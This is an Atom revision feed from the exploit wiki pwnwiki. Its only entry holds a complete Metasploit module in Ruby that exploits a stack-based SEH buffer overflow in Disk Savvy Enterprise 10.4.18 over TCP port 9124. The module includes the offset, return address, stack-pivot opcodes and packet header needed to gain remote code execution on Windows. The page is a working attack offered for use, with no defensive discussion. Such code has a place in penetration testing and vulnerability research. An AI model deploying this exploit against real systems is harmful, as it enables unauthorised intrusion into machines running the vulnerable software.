<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Disk Savvy Enterprise 10.4.18 緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-25T10:13:37Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1531&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitModule...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Disk_Savvy_Enterprise_10.4.18_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1531&amp;oldid=prev"/>
		<updated>2021-04-11T02:10:54Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitModule...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# This module requires Metasploit: https://metasploit.com/download&lt;br /&gt;
# Current source: https://github.com/rapid7/metasploit-framework&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
class MetasploitModule &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
  Rank = GreatRanking&lt;br /&gt;
&lt;br /&gt;
  include Msf::Exploit::Remote::Tcp&lt;br /&gt;
  include Msf::Exploit::Remote::Seh&lt;br /&gt;
&lt;br /&gt;
  def initialize(info = {})&lt;br /&gt;
    super(update_info(info,&lt;br /&gt;
      'Name'           =&amp;gt; 'Disk Savvy Enterprise v10.4.18',&lt;br /&gt;
      'Description'    =&amp;gt; %q{&lt;br /&gt;
        This module exploits a stack-based buffer overflow vulnerability&lt;br /&gt;
        in Disk Savvy Enterprise v10.4.18, caused by improper bounds&lt;br /&gt;
        checking of the request sent to the built-in server. This module&lt;br /&gt;
        has been tested successfully on Windows 7 SP1 x86.&lt;br /&gt;
      },&lt;br /&gt;
      'License'        =&amp;gt; MSF_LICENSE,&lt;br /&gt;
      'Author'         =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          'Daniel Teixeira'&lt;br /&gt;
        ],&lt;br /&gt;
      'DefaultOptions' =&amp;gt;&lt;br /&gt;
        {&lt;br /&gt;
          'EXITFUNC' =&amp;gt; 'thread'&lt;br /&gt;
        },&lt;br /&gt;
      'Platform'       =&amp;gt; 'win',&lt;br /&gt;
      'Payload'        =&amp;gt;&lt;br /&gt;
        {&lt;br /&gt;
          'BadChars'   =&amp;gt; &amp;quot;\x00\x02\x0a\x0d\xf8&amp;quot;,&lt;br /&gt;
          'Space'      =&amp;gt; 800&lt;br /&gt;
        },&lt;br /&gt;
      'Targets'        =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          [ 'Disk Savvy Enterprise v10.4.18',&lt;br /&gt;
            {&lt;br /&gt;
              'Offset' =&amp;gt; 124,&lt;br /&gt;
              'Ret'    =&amp;gt; 0x10056d13&lt;br /&gt;
            }&lt;br /&gt;
          ]&lt;br /&gt;
        ],&lt;br /&gt;
      'Privileged'     =&amp;gt; true,&lt;br /&gt;
      'DisclosureDate' =&amp;gt; 'Jan 31 2017',&lt;br /&gt;
      'DefaultTarget'  =&amp;gt; 0))&lt;br /&gt;
&lt;br /&gt;
    register_options([Opt::RPORT(9124)])&lt;br /&gt;
&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def exploit&lt;br /&gt;
    seh = generate_seh_record(target.ret)&lt;br /&gt;
    connect&lt;br /&gt;
&lt;br /&gt;
    buffer = make_nops(target['Offset'])&lt;br /&gt;
    buffer &amp;lt;&amp;lt; seh&lt;br /&gt;
    buffer &amp;lt;&amp;lt; &amp;quot;\x83\xc4\x7f&amp;quot; * 13   #ADD esp,7fh&lt;br /&gt;
    buffer &amp;lt;&amp;lt; &amp;quot;\x83\xc4\x21&amp;quot;        #ADD esp,21h&lt;br /&gt;
    buffer &amp;lt;&amp;lt; &amp;quot;\xff\xe4&amp;quot;            #JMP esp&lt;br /&gt;
    buffer &amp;lt;&amp;lt; payload.encoded&lt;br /&gt;
    buffer &amp;lt;&amp;lt; Rex::Text.rand_text_alphanumeric(1)&lt;br /&gt;
&lt;br /&gt;
    header = &amp;quot;\x75\x19\xba\xab&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; &amp;quot;\x03\x00\x00\x00&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; &amp;quot;\x00\x40\x00\x00&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; [buffer.length].pack(&amp;quot;V&amp;quot;)&lt;br /&gt;
    header &amp;lt;&amp;lt; [buffer.length].pack(&amp;quot;V&amp;quot;)&lt;br /&gt;
    header &amp;lt;&amp;lt; [buffer[-1].ord].pack(&amp;quot;V&amp;quot;)&lt;br /&gt;
    packet = header&lt;br /&gt;
    packet &amp;lt;&amp;lt; buffer&lt;br /&gt;
&lt;br /&gt;
    sock.put(packet)&lt;br /&gt;
    handler&lt;br /&gt;
  end&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>